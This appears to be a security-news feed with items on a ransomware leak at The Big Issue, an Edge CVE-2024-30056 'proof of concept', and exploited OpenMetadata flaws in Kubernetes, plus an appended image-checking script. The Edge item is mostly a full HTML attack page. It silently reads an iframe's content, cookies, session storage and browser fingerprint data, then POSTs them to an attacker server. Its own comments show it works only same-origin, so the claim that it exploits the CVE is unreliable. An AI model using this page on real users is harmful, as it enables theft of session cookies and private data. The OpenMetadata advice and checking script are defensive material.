Open source tools allow threat actors to exploit a loophole in Microsoft’s kernel driver authentication procedures.
The CyberWire
Ransomware hits The Big Issue. Qilin group leaks confidential data
The Qilin ransomware group has targeted The Big Issue, a street newspaper sold by the homeless and vulnerable.
A post on Qilin’s dark web leak site claimed the gang has stolen 550 GB of confidential data from the periodical’s parent company.
Read more in my article on the Hot for Security blog.
Graham Cluley
PoC Exploit Released for Microsoft Edge Information Disclosure Vulnerability
Cybersecurity researchers have released a Proof-of-Concept (PoC) exploit for a recently disclosed information disclosure vulnerability in Microsoft Edge, the Chromium-based web browser.
The vulnerability, tracked as CVE-2024-30056, could allow unauthorized actors to access private user information, raising concerns about data privacy and security.
The vulnerability, classified as an information disclosure issue, stems from a weakness identified as CWE-359: Exposure of Private Personal Information to an Unauthorized Actor.
Microsoft, the assigning Common Vulnerabilities and Exposures (CVE) Numbering Authority (CNA), has rated the vulnerability’s severity as “Important” with a Common Vulnerability Scoring System (CVSS) score of 7.1 out of 10.
The release of the PoC exploit has heightened concerns about the vulnerability’s potential impact.
POC
The exploit demonstrates the feasibility of unauthorized access to private user information, underscoring the need for Microsoft Edge users to take immediate action to mitigate the risk.
```html
<!DOCTYPE html>
<html>
<head>
  <title>PoC CVE-2024-30056</title>
  <style>
    body { font-family: Arial, sans-serif; margin: 20px; }
    h1 { color: #333; }
    pre { background-color: #f5f5f5; padding: 10px; border: 1px solid #ddd; overflow: auto; }
    button { padding: 10px 20px; background-color: #007bff; color: #fff; border: none; border-radius: 5px; cursor: pointer; }
    button:hover { background-color: #0056b3; }
  </style>
</head>
<body>
  <h1>PoC CVE-2024-30056</h1>
  <!-- The page to be read is loaded into a hidden iframe. -->
  <iframe id="targetIframe" src="http://localhost/sensitive_page.html" style="display:none;"></iframe>
  <script>
    // Once the iframe has loaded, the PoC reads its DOM together with the
    // cookies, sessionStorage and history of the embedding page.
    document.getElementById('targetIframe').onload = function () {
      try {
        let iframeDocument = document.getElementById('targetIframe').contentWindow.document;
        // Every captured value is wrapped as base64(encodeURIComponent(escape(value))).
        let sensitiveData = btoa(encodeURIComponent(escape(iframeDocument.documentElement.innerHTML)));
        let cookies = btoa(encodeURIComponent(escape(document.cookie)));
        let sessions = btoa(encodeURIComponent(escape(JSON.stringify(sessionStorage))));
        // The History object does not expose visited URLs, so this serialises to "{}".
        let browsingHistory = btoa(encodeURIComponent(escape(JSON.stringify(history))));
        // decode() reverses that wrapping in the correct order
        // (the original nested the decode calls in the wrong order).
        function decode(b64) {
          return unescape(decodeURIComponent(atob(b64)));
        }
        let browserData = {
          userAgent: navigator.userAgent,
          platform: navigator.platform,
          language: navigator.language,
          plugins: [],
          mimeTypes: [],
          screen: {
            width: window.screen.width,
            height: window.screen.height,
            colorDepth: window.screen.colorDepth
          },
          timezoneOffset: new Date().getTimezoneOffset()
        };
        for (let i = 0; i < navigator.plugins.length; i++) {
          browserData.plugins.push({
            name: navigator.plugins[i].name,
            filename: navigator.plugins[i].filename,
            description: navigator.plugins[i].description
          });
        }
        for (let i = 0; i < navigator.mimeTypes.length; i++) {
          browserData.mimeTypes.push({
            type: navigator.mimeTypes[i].type,
            description: navigator.mimeTypes[i].description,
            suffixes: navigator.mimeTypes[i].suffixes
          });
        }
        // Display everything that was collected in a popup window.
        let popup = window.open('', 'Sensitive Data', 'width=600,height=600');
        popup.document.write('<h1>Sensitive Data</h1>');
        popup.document.write('<pre>' + decode(sensitiveData) + '</pre>');
        popup.document.write('<h2>Cookies:</h2>');
        popup.document.write('<pre>' + decode(cookies) + '</pre>');
        popup.document.write('<h2>User Sessions:</h2>');
        popup.document.write('<pre>' + decode(sessions) + '</pre>');
        popup.document.write('<h2>Browsing History:</h2>');
        popup.document.write('<pre>' + decode(browsingHistory) + '</pre>');
        popup.document.write('<h2>Browser Information:</h2>');
        popup.document.write('<pre>' + JSON.stringify(browserData, null, 2) + '</pre>');
        // sendData() is defined in this closure, not in the popup's own window,
        // so the inline onclick below cannot resolve it as written.
        popup.document.write('<button onclick="sendData()">Send Data</button>');
        function sendData() {
          let xhr = new XMLHttpRequest();
          xhr.open('POST', 'http://Attacker-server.com/steal_data', true);
          xhr.setRequestHeader('Content-Type', 'application/json');
          xhr.send(JSON.stringify({ sensitiveData: sensitiveData, cookies: cookies, sessions: sessions, browsingHistory: browsingHistory }));
          alert('Stolen data has been sent to the malicious server!');
        }
      } catch (error) {
        // A cross-origin iframe throws a SecurityError here; the PoC only works same-origin.
        console.error('Error accessing iframe content:', error);
      }
    };
  </script>
</body>
</html>
```
Microsoft has acknowledged the vulnerability and is working on a patch to address the issue.
In the meantime, the company has advised Microsoft Edge users to exercise caution when browsing the web and to ensure their browser is updated to the latest version as soon as a fix becomes available.
This incident reminds us of the importance of staying vigilant and applying security best practices.
Users are encouraged to keep their software up to date, regularly apply security patches, and exercise caution when clicking on links or downloading attachments from untrusted sources.
As more details emerge about the vulnerability and its potential impact, Microsoft Edge users are advised to stay informed and follow the company’s guidance to protect their data and maintain the security of their browsing experience.
The post PoC Exploit Released for Microsoft Edge Information Disclosure Vulnerability appeared first on Cyber Security News.
Kubernetes Clusters Under Attack: Critical OpenMetadata Vulnerabilities Exploited
Microsoft Security recently revealed a sophisticated cyber-attack campaign that targets Kubernetes clusters by exploiting newly discovered vulnerabilities in the OpenMetadata platform.
The attackers have set their sights on Kubernetes workloads, leveraging critical vulnerabilities in the OpenMetadata platform to infiltrate and exploit these systems for cryptomining activities.
OpenMetadata, an open-source platform designed for comprehensive metadata management across various data sources, has become the latest target due to its widespread use and central role in data governance and discovery.
On March 15, 2024, a series of vulnerabilities within the OpenMetadata platform were disclosed, affecting versions prior to 1.3.1.
These vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, pose a significant risk as they allow attackers to bypass authentication mechanisms, enabling unauthorized code execution on containers running the vulnerable OpenMetadata versions.
Microsoft said the attack begins by identifying Kubernetes workloads running OpenMetadata that are exposed to the Internet.
By pinpointing systems running outdated and vulnerable versions of the application, attackers can exploit the vulnerabilities mentioned to gain unauthorized access and execute malicious code within the container environment.
This method of attack not only compromises the integrity and confidentiality of the Kubernetes workloads, but also lets attackers use the compromised systems for cryptomining, siphoning off valuable computing resources for their own gain.
In response to this critical threat, Microsoft strongly recommends that all customers review their Kubernetes clusters running OpenMetadata workloads.
It is imperative that these systems be updated to the latest version (1.3.1 or later) to mitigate the risk of exploitation.
If OpenMetadata needs to be accessible on the internet, ensure that secure authentication mechanisms are in place and avoid relying on default login credentials.
To get a list of all the images running in the cluster:
kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'
If there is a pod with a vulnerable image, update the image version to the latest version.
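The kubectl command above lists image references, but deciding which of them are older than the fixed release still has to be done by eye. The following POSIX shell script is an added example, not part of the article or of Microsoft's guidance: it parses image references of the form the command prints, extracts the tag, and flags any OpenMetadata image whose version is lower than 1.3.1. The image list embedded in SAMPLE_IMAGES is constructed sample data (the registry and repository names are assumptions); in a real cluster, pipe the output of the kubectl command into check_images instead.

```shell
#!/bin/sh
# Added example: flag OpenMetadata container images older than the fixed release.
# Not from the article or from Microsoft; registry/repository names are assumptions.

FIXED_VERSION="1.3.1"

# CONSTRUCTED sample input in the format printed by the kubectl/jsonpath command.
SAMPLE_IMAGES='docker.getcollate.io/openmetadata/server:1.2.3
docker.getcollate.io/openmetadata/ingestion:1.3.1
registry.internal:5000/openmetadata/server:1.3.0
openmetadata/server:latest
docker.io/library/nginx:1.25.4'

# version_lt A B -> status 0 when dotted version A is strictly lower than B.
version_lt() {
    [ "$1" = "$2" ] && return 1
    lowest=$(printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n1)
    [ "$lowest" = "$1" ]
}

# image_tag IMAGE -> prints the tag of an image reference ("latest" when absent).
# A ':' only denotes a tag when it appears after the last '/', so that a
# registry port such as registry.internal:5000 is not mistaken for a tag.
image_tag() {
    ref=${1%%@*}           # drop a trailing @sha256:... digest
    last=${ref##*/}        # last path segment, e.g. server:1.2.3
    case "$last" in
        *:*) printf '%s\n' "${last##*:}" ;;
        *)   printf 'latest\n' ;;
    esac
}

# is_vulnerable_image IMAGE -> 0 = OpenMetadata image older than 1.3.1,
# 1 = fixed version or not an OpenMetadata image,
# 2 = cannot tell from the tag (e.g. "latest"); inspect such pods manually.
is_vulnerable_image() {
    case "$1" in
        *openmetadata*) ;;
        *) return 1 ;;
    esac
    tag=$(image_tag "$1")
    expr "$tag" : '[0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*$' >/dev/null || return 2
    version_lt "$tag" "$FIXED_VERSION"
}

# check_images reads one image reference per line from stdin, prints the
# vulnerable and undecidable ones, and returns 1 if any vulnerable image was seen.
check_images() {
    found=0
    while IFS= read -r img; do
        [ -n "$img" ] || continue
        rc=0
        is_vulnerable_image "$img" || rc=$?
        case "$rc" in
            0) printf 'VULNERABLE  %s\n' "$img"; found=1 ;;
            2) printf 'UNKNOWN     %s (non-numeric tag, inspect manually)\n' "$img" ;;
        esac
    done
    [ "$found" -eq 0 ]
}

# Stand-alone run over the constructed sample; replace the printf with the
# kubectl command from the article to scan a live cluster.
printf '%s\n' "$SAMPLE_IMAGES" | check_images \
    || echo "-> update the flagged images to $FIXED_VERSION or later"
```

Images tagged `latest` or with a non-numeric tag are reported as UNKNOWN rather than silently passed, because the tag alone does not prove the fixed version is running; for those, inspect the running container or pin the deployment to an explicit version.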
The post Kubernetes Clusters Under Attack: Critical OpenMetadata Vulnerabilities Exploited appeared first on Cyber Security News.
Cyber Security News